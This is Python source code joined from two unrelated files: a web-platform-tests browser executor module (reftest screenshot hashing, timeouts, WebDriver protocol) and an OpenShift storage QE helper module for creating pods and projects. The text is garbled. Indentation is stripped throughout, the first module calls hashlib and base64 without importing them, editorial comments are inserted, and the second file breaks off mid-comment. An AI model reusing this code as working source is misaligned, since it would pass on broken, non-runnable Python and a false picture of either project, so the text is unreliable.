import io
import json
import os
import threading
import traceback
import socket
import sys
from abc import ABCMeta, abstractmethod
from http.client import HTTPConnection
from typing import Any, Callable, ClassVar, Optional, Tuple, Type, TYPE_CHECKING
from urllib.parse import urljoin, urlsplit, urlunsplit
from .actions import actions
from .protocol import Protocol, BaseProtocolPart
if TYPE_CHECKING:
from ..webdriver_server import WebDriverServer
here = os.path.dirname(__file__)
def executor_kwargs(test_type, test_environment, run_info_data, **kwargs):
timeout_multiplier = kwargs["timeout_multiplier"]
if timeout_multiplier is None:
timeout_multiplier = 1
executor_kwargs = {"server_config": test_environment.config,
"timeout_multiplier": timeout_multiplier,
"debug_info": kwargs["debug_info"]}
if test_type in ("reftest", "print-reftest"):
executor_kwargs["screenshot_cache"] = test_environment.cache_manager.dict()
if test_type == "wdspec":
executor_kwargs["binary"] = kwargs.get("binary")
executor_kwargs["webdriver_binary"] = kwargs.get("webdriver_binary")
executor_kwargs["webdriver_args"] = kwargs.get("webdriver_args")
# By default the executor may try to cleanup windows after a test (to best
# associate any problems with the test causing them). If the user might
# want to view the results, however, the executor has to skip that cleanup.
if kwargs["pause_after_test"] or kwargs["pause_on_unexpected"]:
executor_kwargs["cleanup_after_test"] = False
executor_kwargs["debug_test"] = kwargs["debug_test"]
return executor_kwargs
def strip_server(url):
"""Remove the scheme and netloc from a url, leaving only the path and any query
or fragment.
url - the url to strip
e.g. http://example.org:8000/tests?id=1#2 becomes /tests?id=1#2"""
url_parts = list(urlsplit(url))
url_parts[0] = ""
url_parts[1] = ""
return urlunsplit(url_parts)
class TestharnessResultConverter(object):
harness_codes = {0: "OK",
1: "ERROR",
2: "TIMEOUT",
3: "PRECONDITION_FAILED"}
test_codes = {0: "PASS",
1: "FAIL",
2: "TIMEOUT",
3: "NOTRUN",
4: "PRECONDITION_FAILED"}
def __call__(self, test, result, extra=None):
"""Convert a JSON result into a (TestResult, [SubtestResult]) tuple"""
result_url, status, message, stack, subtest_results = result
assert result_url == test.url, ("Got results from %s, expected %s" %
(result_url, test.url))
harness_result = test.result_cls(self.harness_codes[status], message, extra=extra, stack=stack)
return (harness_result,
[test.subtest_result_cls(st_name, self.test_codes[st_status], st_message, st_stack)
for st_name, st_status, st_message, st_stack in subtest_results])
testharness_result_converter = TestharnessResultConverter()
def hash_screenshots(screenshots):
"""Computes the sha1 checksum of a list of base64-encoded screenshots."""
return [hashlib.sha1(base64.b64decode(screenshot)).hexdigest()
for screenshot in screenshots]
def _ensure_hash_in_reftest_screenshots(extra):
"""Make sure reftest_screenshots have hashes.
Marionette internal reftest runner does not produce hashes.
"""
log_data = extra.get("reftest_screenshots")
if not log_data:
return
for item in log_data:
if type(item) != dict:
# Skip relation strings.
continue
if "hash" not in item:
item["hash"] = hash_screenshots([item["screenshot"]])[0]
def get_pages(ranges_value, total_pages):
"""Get a set of page numbers to include in a print reftest.
:param ranges_value: Parsed page ranges as a list e.g. [[1,2], [4], [6,None]]
:param total_pages: Integer total number of pages in the paginated output.
:retval: Set containing integer page numbers to include in the comparison e.g.
for the example ranges value and 10 total pages this would be
{1,2,4,6,7,8,9,10}"""
if not ranges_value:
return set(range(1, total_pages + 1))
rv = set()
for range_limits in ranges_value:
if len(range_limits) == 1:
range_limits = [range_limits[0], range_limits[0]]
if range_limits[0] is None:
range_limits[0] = 1
if range_limits[1] is None:
range_limits[1] = total_pages
if range_limits[0] > total_pages:
continue
rv |= set(range(range_limits[0], range_limits[1] + 1))
return rv
def reftest_result_converter(self, test, result):
extra = result.get("extra", {})
_ensure_hash_in_reftest_screenshots(extra)
return (test.result_cls(
result["status"],
result["message"],
extra=extra,
stack=result.get("stack")), [])
def pytest_result_converter(self, test, data):
harness_data, subtest_data = data
if subtest_data is None:
subtest_data = []
harness_result = test.result_cls(*harness_data)
subtest_results = [test.subtest_result_cls(*item) for item in subtest_data]
return (harness_result, subtest_results)
def crashtest_result_converter(self, test, result):
return test.result_cls(**result), []
class ExecutorException(Exception):
def __init__(self, status, message):
self.status = status
self.message = message
class TimedRunner(object):
def __init__(self, logger, func, protocol, url, timeout, extra_timeout):
self.func = func
self.logger = logger
self.result = None
self.protocol = protocol
self.url = url
self.timeout = timeout
self.extra_timeout = extra_timeout
self.result_flag = threading.Event()
def run(self):
for setup_fn in [self.set_timeout, self.before_run]:
err = setup_fn()
if err:
self.result = (False, err)
return self.result
executor = threading.Thread(target=self.run_func)
executor.start()
# Add twice the extra timeout since the called function is expected to
# wait at least self.timeout + self.extra_timeout and this gives some leeway
timeout = self.timeout + 2 * self.extra_timeout if self.timeout else None
finished = self.result_flag.wait(timeout)
if self.result is None:
if finished:
                # flag is True unless we timeout; this *shouldn't* happen, but
                # it can if self.run_func raises before setting self.result
self.result = False, ("INTERNAL-ERROR", "%s.run_func didn't set a result" %
self.__class__.__name__)
else:
if self.protocol.is_alive():
message = "Executor hit external timeout (this may indicate a hang)\n"
# get a traceback for the current stack of the executor thread
message += "".join(traceback.format_stack(sys._current_frames()[executor.ident]))
self.result = False, ("EXTERNAL-TIMEOUT", message)
else:
self.logger.info("Browser not responding, setting status to CRASH")
self.result = False, ("CRASH", None)
elif self.result[1] is None:
# We didn't get any data back from the test, so check if the
# browser is still responsive
if self.protocol.is_alive():
self.result = False, ("INTERNAL-ERROR", None)
else:
self.logger.info("Browser not responding, setting status to CRASH")
self.result = False, ("CRASH", None)
return self.result
def set_timeout(self):
raise NotImplementedError
def before_run(self):
pass
def run_func(self):
raise NotImplementedError
class TestExecutor(object):
"""Abstract Base class for object that actually executes the tests in a
specific browser. Typically there will be a different TestExecutor
subclass for each test type and method of executing tests.
:param browser: ExecutorBrowser instance providing properties of the
browser that will be tested.
:param server_config: Dictionary of wptserve server configuration of the
form stored in TestEnvironment.config
:param timeout_multiplier: Multiplier relative to base timeout to use
when setting test timeout.
"""
__metaclass__ = ABCMeta
test_type = None # type: ClassVar[str]
# convert_result is a class variable set to a callable converter
# (e.g. reftest_result_converter) converting from an instance of
# URLManifestItem (e.g. RefTest) + type-dependent results object +
# type-dependent extra data, returning a tuple of Result and list of
# SubtestResult. For now, any callable is accepted. TODO: Make this type
# stricter when more of the surrounding code is annotated.
convert_result = None # type: ClassVar[Callable[..., Any]]
supports_testdriver = False
supports_jsshell = False
# Extra timeout to use after internal test timeout at which the harness
# should force a timeout
extra_timeout = 5 # seconds
def __init__(self, logger, browser, server_config, timeout_multiplier=1,
debug_info=None, **kwargs):
self.logger = logger
self.runner = None
self.browser = browser
self.server_config = server_config
self.timeout_multiplier = timeout_multiplier
self.debug_info = debug_info
self.last_environment = {"protocol": "http",
"prefs": {}}
self.protocol = None # This must be set in subclasses
def setup(self, runner):
"""Run steps needed before tests can be started e.g. connecting to
browser instance
:param runner: TestRunner instance that is going to run the tests"""
self.runner = runner
if self.protocol is not None:
self.protocol.setup(runner)
def teardown(self):
"""Run cleanup steps after tests have finished"""
if self.protocol is not None:
self.protocol.teardown()
def reset(self):
"""Re-initialize internal state to facilitate repeated test execution
as implemented by the `--rerun` command-line argument."""
pass
def run_test(self, test):
"""Run a particular test.
:param test: The test to run"""
try:
if test.environment != self.last_environment:
self.on_environment_change(test.environment)
result = self.do_test(test)
except Exception as e:
exception_string = traceback.format_exc()
self.logger.warning(exception_string)
result = self.result_from_exception(test, e, exception_string)
# log result of parent test
if result[0].status == "ERROR":
self.logger.debug(result[0].message)
self.last_environment = test.environment
self.runner.send_message("test_ended", test, result)
def server_url(self, protocol, subdomain=False):
scheme = "https" if protocol == "h2" else protocol
host = self.server_config["browser_host"]
if subdomain:
# The only supported subdomain filename flag is "www".
host = "{subdomain}.{host}".format(subdomain="www", host=host)
return "{scheme}://{host}:{port}".format(scheme=scheme, host=host,
port=self.server_config["ports"][protocol][0])
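    # Illustrative sketch (editor's note, assumed config values): with a server config
    # of {"browser_host": "web-platform.test", "ports": {"https": [8443]}},
    # server_url("https", subdomain=True) would yield
    # "https://www.web-platform.test:8443".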
def test_url(self, test):
return urljoin(self.server_url(test.environment["protocol"],
test.subdomain), test.url)
@abstractmethod
def do_test(self, test):
"""Test-type and protocol specific implementation of running a
specific test.
:param test: The test to run."""
pass
def on_environment_change(self, new_environment):
pass
def result_from_exception(self, test, e, exception_string):
if hasattr(e, "status") and e.status in test.result_cls.statuses:
status = e.status
else:
status = "INTERNAL-ERROR"
message = str(getattr(e, "message", ""))
if message:
message += "\n"
message += exception_string
return test.result_cls(status, message), []
def wait(self):
return self.protocol.base.wait()
class TestharnessExecutor(TestExecutor):
convert_result = testharness_result_converter
class RefTestExecutor(TestExecutor):
convert_result = reftest_result_converter
is_print = False
def __init__(self, logger, browser, server_config, timeout_multiplier=1, screenshot_cache=None,
debug_info=None, **kwargs):
TestExecutor.__init__(self, logger, browser, server_config,
timeout_multiplier=timeout_multiplier,
debug_info=debug_info)
self.screenshot_cache = screenshot_cache
class CrashtestExecutor(TestExecutor):
convert_result = crashtest_result_converter
class PrintRefTestExecutor(TestExecutor):
convert_result = reftest_result_converter
is_print = True
class RefTestImplementation(object):
def __init__(self, executor):
self.timeout_multiplier = executor.timeout_multiplier
self.executor = executor
# Cache of url:(screenshot hash, screenshot). Typically the
# screenshot is None, but we set this value if a test fails
# and the screenshot was taken from the cache so that we may
# retrieve the screenshot from the cache directly in the future
self.screenshot_cache = self.executor.screenshot_cache
self.message = None
def setup(self):
pass
def teardown(self):
pass
@property
def logger(self):
return self.executor.logger
def get_hash(self, test, viewport_size, dpi, page_ranges):
key = (test.url, viewport_size, dpi)
if key not in self.screenshot_cache:
success, data = self.get_screenshot_list(test, viewport_size, dpi, page_ranges)
if not success:
return False, data
screenshots = data
hash_values = hash_screenshots(data)
self.screenshot_cache[key] = (hash_values, screenshots)
rv = (hash_values, screenshots)
else:
rv = self.screenshot_cache[key]
self.message.append("%s %s" % (test.url, rv[0]))
return True, rv
def reset(self):
self.screenshot_cache.clear()
def check_pass(self, hashes, screenshots, urls, relation, fuzzy):
"""Check if a test passes, and return a tuple of (pass, page_idx),
where page_idx is the zero-based index of the first page on which a
difference occurs if any, or None if there are no differences"""
assert relation in ("==", "!=")
lhs_hashes, rhs_hashes = hashes
lhs_screenshots, rhs_screenshots = screenshots
if len(lhs_hashes) != len(rhs_hashes):
self.logger.info("Got different number of pages")
return relation == "!=", None
assert len(lhs_screenshots) == len(lhs_hashes) == len(rhs_screenshots) == len(rhs_hashes)
for (page_idx, (lhs_hash,
rhs_hash,
lhs_screenshot,
rhs_screenshot)) in enumerate(zip(lhs_hashes,
rhs_hashes,
lhs_screenshots,
rhs_screenshots)):
comparison_screenshots = (lhs_screenshot, rhs_screenshot)
if not fuzzy or fuzzy == ((0, 0), (0, 0)):
equal = lhs_hash == rhs_hash
# sometimes images can have different hashes, but pixels can be identical.
if not equal:
self.logger.info("Image hashes didn't match%s, checking pixel differences" %
("" if len(hashes) == 1 else " on page %i" % (page_idx + 1)))
max_per_channel, pixels_different = self.get_differences(comparison_screenshots,
urls)
equal = pixels_different == 0 and max_per_channel == 0
else:
max_per_channel, pixels_different = self.get_differences(comparison_screenshots,
urls,
page_idx if len(hashes) > 1 else None)
allowed_per_channel, allowed_different = fuzzy
self.logger.info("Allowed %s pixels different, maximum difference per channel %s" %
("-".join(str(item) for item in allowed_different),
"-".join(str(item) for item in allowed_per_channel)))
equal = ((pixels_different == 0 and allowed_different[0] == 0) or
(max_per_channel == 0 and allowed_per_channel[0] == 0) or
(allowed_per_channel[0] <= max_per_channel <= allowed_per_channel[1] and
allowed_different[0] <= pixels_different <= allowed_different[1]))
if not equal:
return (False if relation == "==" else True, page_idx)
# All screenshots were equal within the fuzziness
return (True if relation == "==" else False, None)
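    # Illustrative sketch (editor's note, assumed fuzzy value): a fuzzy tuple of
    # ((0, 2), (0, 10)) allows each differing pixel to deviate by at most 2 per channel
    # and at most 10 pixels to differ in total, so check_pass treats such a pair of
    # screenshots as matching for an "==" relation.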
def get_differences(self, screenshots, urls, page_idx=None):
from PIL import Image, ImageChops, ImageStat
lhs = Image.open(io.BytesIO(base64.b64decode(screenshots[0]))).convert("RGB")
rhs = Image.open(io.BytesIO(base64.b64decode(screenshots[1]))).convert("RGB")
self.check_if_solid_color(lhs, urls[0])
self.check_if_solid_color(rhs, urls[1])
diff = ImageChops.difference(lhs, rhs)
minimal_diff = diff.crop(diff.getbbox())
mask = minimal_diff.convert("L", dither=None)
stat = ImageStat.Stat(minimal_diff, mask)
per_channel = max(item[1] for item in stat.extrema)
count = stat.count[0]
self.logger.info("Found %s pixels different, maximum difference per channel %s%s" %
(count,
per_channel,
"" if page_idx is None else " on page %i" % (page_idx + 1)))
return per_channel, count
def check_if_solid_color(self, image, url):
extrema = image.getextrema()
if all(min == max for min, max in extrema):
color = ''.join('%02X' % value for value, _ in extrema)
self.message.append("Screenshot is solid color 0x%s for %s\n" % (color, url))
def run_test(self, test):
viewport_size = test.viewport_size
dpi = test.dpi
page_ranges = test.page_ranges
self.message = []
# Depth-first search of reference tree, with the goal
        # of reaching a leaf node with only pass results
stack = list(((test, item[0]), item[1]) for item in reversed(test.references))
page_idx = None
while stack:
hashes = [None, None]
screenshots = [None, None]
urls = [None, None]
nodes, relation = stack.pop()
fuzzy = self.get_fuzzy(test, nodes, relation)
for i, node in enumerate(nodes):
success, data = self.get_hash(node, viewport_size, dpi, page_ranges)
if success is False:
return {"status": data[0], "message": data[1]}
hashes[i], screenshots[i] = data
urls[i] = node.url
is_pass, page_idx = self.check_pass(hashes, screenshots, urls, relation, fuzzy)
if is_pass:
fuzzy = self.get_fuzzy(test, nodes, relation)
if nodes[1].references:
stack.extend(list(((nodes[1], item[0]), item[1])
for item in reversed(nodes[1].references)))
else:
# We passed
return {"status": "PASS", "message": None}
# We failed, so construct a failure message
if page_idx is None:
# default to outputting the last page
page_idx = -1
for i, (node, screenshot) in enumerate(zip(nodes, screenshots)):
if screenshot is None:
success, screenshot = self.retake_screenshot(node, viewport_size, dpi, page_ranges)
if success:
screenshots[i] = screenshot
log_data = [
{"url": nodes[0].url,
"screenshot": screenshots[0][page_idx],
"hash": hashes[0][page_idx]},
relation,
{"url": nodes[1].url,
"screenshot": screenshots[1][page_idx],
"hash": hashes[1][page_idx]},
]
return {"status": "FAIL",
"message": "\n".join(self.message),
"extra": {"reftest_screenshots": log_data}}
def get_fuzzy(self, root_test, test_nodes, relation):
full_key = tuple([item.url for item in test_nodes] + [relation])
ref_only_key = test_nodes[1].url
fuzzy_override = root_test.fuzzy_override
fuzzy = test_nodes[0].fuzzy
sources = [fuzzy_override, fuzzy]
keys = [full_key, ref_only_key, None]
value = None
for source in sources:
for key in keys:
if key in source:
value = source[key]
break
if value:
break
return value
def retake_screenshot(self, node, viewport_size, dpi, page_ranges):
success, data = self.get_screenshot_list(node,
viewport_size,
dpi,
page_ranges)
if not success:
return False, data
key = (node.url, viewport_size, dpi)
hash_val, _ = self.screenshot_cache[key]
self.screenshot_cache[key] = hash_val, data
return True, data
def get_screenshot_list(self, node, viewport_size, dpi, page_ranges):
success, data = self.executor.screenshot(node, viewport_size, dpi, page_ranges)
if success and not isinstance(data, list):
return success, [data]
return success, data
class WdspecExecutor(TestExecutor):
convert_result = pytest_result_converter
protocol_cls = None # type: ClassVar[Type[Protocol]]
def __init__(self, logger, browser, server_config, webdriver_binary,
webdriver_args, timeout_multiplier=1, capabilities=None,
debug_info=None, environ=None, **kwargs):
self.do_delayed_imports()
TestExecutor.__init__(self, logger, browser, server_config,
timeout_multiplier=timeout_multiplier,
debug_info=debug_info)
self.webdriver_binary = webdriver_binary
self.webdriver_args = webdriver_args
self.timeout_multiplier = timeout_multiplier
self.capabilities = capabilities
self.environ = environ if environ is not None else {}
self.output_handler_kwargs = None
self.output_handler_start_kwargs = None
def setup(self, runner):
self.protocol = self.protocol_cls(self, self.browser)
super().setup(runner)
def is_alive(self):
return self.protocol.is_alive()
def on_environment_change(self, new_environment):
pass
def do_test(self, test):
timeout = test.timeout * self.timeout_multiplier + self.extra_timeout
success, data = WdspecRun(self.do_wdspec,
self.protocol.session_config,
test.abs_path,
timeout).run()
if success:
return self.convert_result(test, data)
return (test.result_cls(*data), [])
def do_wdspec(self, session_config, path, timeout):
return pytestrunner.run(path,
self.server_config,
session_config,
timeout=timeout)
def do_delayed_imports(self):
global pytestrunner
from . import pytestrunner
class WdspecRun(object):
def __init__(self, func, session, path, timeout):
self.func = func
self.result = (None, None)
self.session = session
self.path = path
self.timeout = timeout
self.result_flag = threading.Event()
def run(self):
"""Runs function in a thread and interrupts it if it exceeds the
given timeout. Returns (True, (Result, [SubtestResult ...])) in
case of success, or (False, (status, extra information)) in the
event of failure.
"""
executor = threading.Thread(target=self._run)
executor.start()
self.result_flag.wait(self.timeout)
if self.result[1] is None:
self.result = False, ("EXTERNAL-TIMEOUT", None)
return self.result
def _run(self):
try:
self.result = True, self.func(self.session, self.path, self.timeout)
except (socket.timeout, IOError):
self.result = False, ("CRASH", None)
except Exception as e:
message = getattr(e, "message")
if message:
message += "\n"
message += traceback.format_exc()
self.result = False, ("INTERNAL-ERROR", message)
finally:
self.result_flag.set()
class ConnectionlessBaseProtocolPart(BaseProtocolPart):
def load(self, url):
pass
def execute_script(self, script, asynchronous=False):
pass
def set_timeout(self, timeout):
pass
def wait(self):
return False
def set_window(self, handle):
pass
def window_handles(self):
return []
class ConnectionlessProtocol(Protocol):
implements = [ConnectionlessBaseProtocolPart]
def connect(self):
pass
def after_connect(self):
pass
class WdspecProtocol(Protocol):
server_cls = None # type: ClassVar[Optional[Type[WebDriverServer]]]
implements = [ConnectionlessBaseProtocolPart]
def __init__(self, executor, browser):
Protocol.__init__(self, executor, browser)
self.webdriver_binary = executor.webdriver_binary
self.webdriver_args = executor.webdriver_args
self.capabilities = self.executor.capabilities
self.session_config = None
self.server = None
self.environ = os.environ.copy()
self.environ.update(executor.environ)
self.output_handler_kwargs = executor.output_handler_kwargs
self.output_handler_start_kwargs = executor.output_handler_start_kwargs
def connect(self):
"""Connect to browser via the HTTP server."""
self.server = self.server_cls(
self.logger,
binary=self.webdriver_binary,
args=self.webdriver_args,
env=self.environ)
self.server.start(block=False,
output_handler_kwargs=self.output_handler_kwargs,
output_handler_start_kwargs=self.output_handler_start_kwargs)
self.logger.info(
"WebDriver HTTP server listening at %s" % self.server.url)
self.session_config = {"host": self.server.host,
"port": self.server.port,
"capabilities": self.capabilities}
def after_connect(self):
pass
def teardown(self):
if self.server is not None and self.server.is_alive():
self.server.stop()
def is_alive(self):
"""Test that the connection is still alive.
Because the remote communication happens over HTTP we need to
make an explicit request to the remote. It is allowed for
WebDriver spec tests to not have a WebDriver session, since this
may be what is tested.
An HTTP request to an invalid path that results in a 404 is
proof enough to us that the server is alive and kicking.
"""
conn = HTTPConnection(self.server.host, self.server.port)
conn.request("HEAD", self.server.base_path + "invalid")
res = conn.getresponse()
return res.status == 404
class CallbackHandler(object):
"""Handle callbacks from testdriver-using tests.
The default implementation here makes sense for things that are roughly like
    WebDriver. Things that differ more from WebDriver may need to create a
fully custom implementation."""
unimplemented_exc = (NotImplementedError,) # type: ClassVar[Tuple[Type[Exception], ...]]
def __init__(self, logger, protocol, test_window):
self.protocol = protocol
self.test_window = test_window
self.logger = logger
self.callbacks = {
"action": self.process_action,
"complete": self.process_complete
}
self.actions = {cls.name: cls(self.logger, self.protocol) for cls in actions}
def __call__(self, result):
url, command, payload = result
self.logger.debug("Got async callback: %s" % result[1])
try:
callback = self.callbacks[command]
except KeyError:
raise ValueError("Unknown callback type %r" % result[1])
return callback(url, payload)
def process_complete(self, url, payload):
rv = [strip_server(url)] + payload
return True, rv
def process_action(self, url, payload):
action = payload["action"]
cmd_id = payload["id"]
self.logger.debug("Got action: %s" % action)
try:
action_handler = self.actions[action]
except KeyError:
raise ValueError("Unknown action %s" % action)
try:
with ActionContext(self.logger, self.protocol, payload.get("context")):
result = action_handler(payload)
except self.unimplemented_exc:
self.logger.warning("Action %s not implemented" % action)
self._send_message(cmd_id, "complete", "error", "Action %s not implemented" % action)
except Exception:
self.logger.warning("Action %s failed" % action)
self.logger.warning(traceback.format_exc())
self._send_message(cmd_id, "complete", "error")
raise
else:
self.logger.debug("Action %s completed with result %s" % (action, result))
return_message = {"result": result}
self._send_message(cmd_id, "complete", "success", json.dumps(return_message))
return False, None
def _send_message(self, cmd_id, message_type, status, message=None):
self.protocol.testdriver.send_message(cmd_id, message_type, status, message=message)
class ActionContext(object):
def __init__(self, logger, protocol, context):
self.logger = logger
self.protocol = protocol
self.context = context
self.initial_window = None
def __enter__(self):
if self.context is None:
return
self.initial_window = self.protocol.base.current_window
self.logger.debug("Switching to window %s" % self.context)
self.protocol.testdriver.switch_to_window(self.context, self.initial_window)
def __exit__(self, *args):
if self.context is None:
return
self.logger.debug("Switching back to initial window")
self.protocol.base.set_window(self.initial_window)
self.initial_window = None
|
helpers.py
|
"""
Helper functions file for OCS QE
"""
import base64
import random
import datetime
import hashlib
import json
import logging
import os
import re
import statistics
import tempfile
import threading
import time
import inspect
from concurrent.futures import ThreadPoolExecutor
from itertools import cycle
from subprocess import PIPE, TimeoutExpired, run
from uuid import uuid4
import yaml
from ocs_ci.framework import config
from ocs_ci.helpers.proxy import (
get_cluster_proxies,
update_container_with_proxy_env,
)
from ocs_ci.ocs.utils import mirror_image
from ocs_ci.ocs import constants, defaults, node, ocp
from ocs_ci.ocs.exceptions import (
CommandFailed,
ResourceWrongStatusException,
TimeoutExpiredError,
UnavailableBuildException,
UnexpectedBehaviour,
)
from ocs_ci.ocs.ocp import OCP
from ocs_ci.ocs.resources import pod, pvc
from ocs_ci.ocs.resources.ocs import OCS
from ocs_ci.utility import templating
from ocs_ci.utility.retry import retry
from ocs_ci.utility.utils import (
TimeoutSampler,
ocsci_log_path,
run_cmd,
update_container_with_mirrored_image,
)
logger = logging.getLogger(__name__)
DATE_TIME_FORMAT = "%Y I%m%d %H:%M:%S.%f"
def create_unique_resource_name(resource_description, resource_type):
"""
Creates a unique object name by using the object_description,
    object_type and a random uuid (in hex) as a suffix, trimmed to stay within
    the kubernetes limitation of 63 characters
Args:
resource_description (str): The user provided object description
resource_type (str): The type of object for which the unique name
will be created. For example: project, pvc, etc
Returns:
str: A unique name
"""
name = f"{resource_type}-{resource_description[:23]}-{uuid4().hex}"
return name if len(name) < 40 else name[:40]
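# Illustrative sketch (editor's note, hypothetical values): a call such as
#   create_unique_resource_name("my-test-case", "pvc")
# yields roughly "pvc-my-test-case-<32-char-hex-uuid>", truncated to 40 characters so
# that derived names stay well under the kubernetes 63-character limit.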
def create_resource(do_reload=True, **kwargs):
"""
Create a resource
Args:
do_reload (bool): True for reloading the resource following its creation,
False otherwise
kwargs (dict): Dictionary of the OCS resource
Returns:
OCS: An OCS instance
Raises:
AssertionError: In case of any failure
"""
ocs_obj = OCS(**kwargs)
resource_name = kwargs.get("metadata").get("name")
created_resource = ocs_obj.create(do_reload=do_reload)
assert created_resource, f"Failed to create resource {resource_name}"
return ocs_obj
def wait_for_resource_state(resource, state, timeout=60):
"""
Wait for a resource to get to a given status
Args:
resource (OCS obj): The resource object
state (str): The status to wait for
timeout (int): Time in seconds to wait
Raises:
ResourceWrongStatusException: In case the resource hasn't
reached the desired state
"""
if (
resource.name == constants.DEFAULT_STORAGECLASS_CEPHFS
or resource.name == constants.DEFAULT_STORAGECLASS_RBD
):
logger.info("Attempt to default default Secret or StorageClass")
return
try:
resource.ocp.wait_for_resource(
condition=state, resource_name=resource.name, timeout=timeout
)
except TimeoutExpiredError:
logger.error(f"{resource.kind} {resource.name} failed to reach {state}")
resource.reload()
raise ResourceWrongStatusException(resource.name, resource.describe())
logger.info(f"{resource.kind} {resource.name} reached state {state}")
def create_pod(
interface_type=None,
pvc_name=None,
do_reload=True,
namespace=defaults.ROOK_CLUSTER_NAMESPACE,
node_name=None,
pod_dict_path=None,
sa_name=None,
dc_deployment=False,
raw_block_pv=False,
raw_block_device=constants.RAW_BLOCK_DEVICE,
replica_count=1,
pod_name=None,
node_selector=None,
command=None,
command_args=None,
deploy_pod_status=constants.STATUS_COMPLETED,
subpath=None,
):
"""
Create a pod
Args:
interface_type (str): The interface type (CephFS, RBD, etc.)
pvc_name (str): The PVC that should be attached to the newly created pod
do_reload (bool): True for reloading the object after creation, False otherwise
namespace (str): The namespace for the new resource creation
node_name (str): The name of specific node to schedule the pod
pod_dict_path (str): YAML path for the pod
sa_name (str): Serviceaccount name
dc_deployment (bool): True if creating pod as deploymentconfig
raw_block_pv (bool): True for creating raw block pv based pod, False otherwise
raw_block_device (str): raw block device for the pod
replica_count (int): Replica count for deployment config
pod_name (str): Name of the pod to create
node_selector (dict): dict of key-value pair to be used for nodeSelector field
eg: {'nodetype': 'app-pod'}
command (list): The command to be executed on the pod
command_args (list): The arguments to be sent to the command running
on the pod
deploy_pod_status (str): Expected status of deploy pod. Applicable
only if dc_deployment is True
subpath (str): Value of subPath parameter in pod yaml
Returns:
Pod: A Pod instance
Raises:
AssertionError: In case of any failure
"""
if (
interface_type == constants.CEPHBLOCKPOOL
or interface_type == constants.CEPHBLOCKPOOL_THICK
):
pod_dict = pod_dict_path if pod_dict_path else constants.CSI_RBD_POD_YAML
interface = constants.RBD_INTERFACE
else:
pod_dict = pod_dict_path if pod_dict_path else constants.CSI_CEPHFS_POD_YAML
interface = constants.CEPHFS_INTERFACE
if dc_deployment:
pod_dict = pod_dict_path if pod_dict_path else constants.FEDORA_DC_YAML
pod_data = templating.load_yaml(pod_dict)
if not pod_name:
pod_name = create_unique_resource_name(f"test-{interface}", "pod")
pod_data["metadata"]["name"] = pod_name
pod_data["metadata"]["namespace"] = namespace
if dc_deployment:
pod_data["metadata"]["labels"]["app"] = pod_name
pod_data["spec"]["template"]["metadata"]["labels"]["name"] = pod_name
pod_data["spec"]["replicas"] = replica_count
if pvc_name:
if dc_deployment:
pod_data["spec"]["template"]["spec"]["volumes"][0]["persistentVolumeClaim"][
"claimName"
] = pvc_name
else:
pod_data["spec"]["volumes"][0]["persistentVolumeClaim"][
"claimName"
] = pvc_name
if interface_type == constants.CEPHBLOCKPOOL and raw_block_pv:
if pod_dict_path in [constants.FEDORA_DC_YAML, constants.FIO_DC_YAML]:
temp_dict = [
{
"devicePath": raw_block_device,
"name": pod_data.get("spec")
.get("template")
.get("spec")
.get("volumes")[0]
.get("name"),
}
]
if pod_dict_path == constants.FEDORA_DC_YAML:
del pod_data["spec"]["template"]["spec"]["containers"][0][
"volumeMounts"
]
security_context = {"capabilities": {"add": ["SYS_ADMIN"]}}
pod_data["spec"]["template"]["spec"]["containers"][0][
"securityContext"
] = security_context
pod_data["spec"]["template"]["spec"]["containers"][0][
"volumeDevices"
] = temp_dict
elif (
pod_dict_path == constants.NGINX_POD_YAML
or pod_dict == constants.CSI_RBD_POD_YAML
):
temp_dict = [
{
"devicePath": raw_block_device,
"name": pod_data.get("spec")
.get("containers")[0]
.get("volumeMounts")[0]
.get("name"),
}
]
del pod_data["spec"]["containers"][0]["volumeMounts"]
pod_data["spec"]["containers"][0]["volumeDevices"] = temp_dict
else:
pod_data["spec"]["containers"][0]["volumeDevices"][0][
"devicePath"
] = raw_block_device
pod_data["spec"]["containers"][0]["volumeDevices"][0]["name"] = (
pod_data.get("spec").get("volumes")[0].get("name")
)
if command:
if dc_deployment:
pod_data["spec"]["template"]["spec"]["containers"][0]["command"] = command
else:
pod_data["spec"]["containers"][0]["command"] = command
if command_args:
if dc_deployment:
pod_data["spec"]["template"]["spec"]["containers"][0]["args"] = command_args
else:
pod_data["spec"]["containers"][0]["args"] = command_args
if node_name:
if dc_deployment:
pod_data["spec"]["template"]["spec"]["nodeName"] = node_name
else:
pod_data["spec"]["nodeName"] = node_name
if node_selector:
if dc_deployment:
pod_data["spec"]["template"]["spec"]["nodeSelector"] = node_selector
else:
pod_data["spec"]["nodeSelector"] = node_selector
if sa_name and dc_deployment:
pod_data["spec"]["template"]["spec"]["serviceAccountName"] = sa_name
if subpath:
if dc_deployment:
pod_data["spec"]["template"]["spec"]["containers"][0]["volumeMounts"][0][
"subPath"
] = subpath
else:
pod_data["spec"]["containers"][0]["volumeMounts"][0]["subPath"] = subpath
# overwrite used image (required for disconnected installation)
update_container_with_mirrored_image(pod_data)
# configure http[s]_proxy env variable, if required
update_container_with_proxy_env(pod_data)
if dc_deployment:
ocs_obj = create_resource(**pod_data)
logger.info(ocs_obj.name)
assert (ocp.OCP(kind="pod", namespace=namespace)).wait_for_resource(
condition=deploy_pod_status,
resource_name=pod_name + "-1-deploy",
resource_count=0,
timeout=360,
sleep=3,
)
dpod_list = pod.get_all_pods(namespace=namespace)
for dpod in dpod_list:
if "-1-deploy" not in dpod.name:
if pod_name in dpod.name:
return dpod
else:
pod_obj = pod.Pod(**pod_data)
pod_name = pod_data.get("metadata").get("name")
logger.info(f"Creating new Pod {pod_name} for test")
created_resource = pod_obj.create(do_reload=do_reload)
assert created_resource, f"Failed to create Pod {pod_name}"
return pod_obj
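# Illustrative usage sketch for create_pod (editor's addition, not part of the
# original module). It assumes an existing Bound PVC object `pvc_obj` and a test
# namespace `namespace`; both names are placeholders.
#
#   rbd_pod = create_pod(
#       interface_type=constants.CEPHBLOCKPOOL,
#       pvc_name=pvc_obj.name,
#       namespace=namespace,
#       pod_name="test-rbd-pod",
#   )
#   wait_for_resource_state(rbd_pod, "Running", timeout=300)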
def create_project(project_name=None):
"""
Create a project
Args:
project_name (str): The name for the new project
Returns:
ocs_ci.ocs.ocp.OCP: Project object
"""
namespace = project_name or create_unique_resource_name("test", "namespace")
project_obj = ocp.OCP(kind="Project", namespace=namespace)
assert project_obj.new_project(namespace), f"Failed to create namespace {namespace}"
return project_obj
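# Illustrative sketch (editor's addition): combining create_project() with
# create_pvc(), which is defined further below. The storage class name is a placeholder.
#
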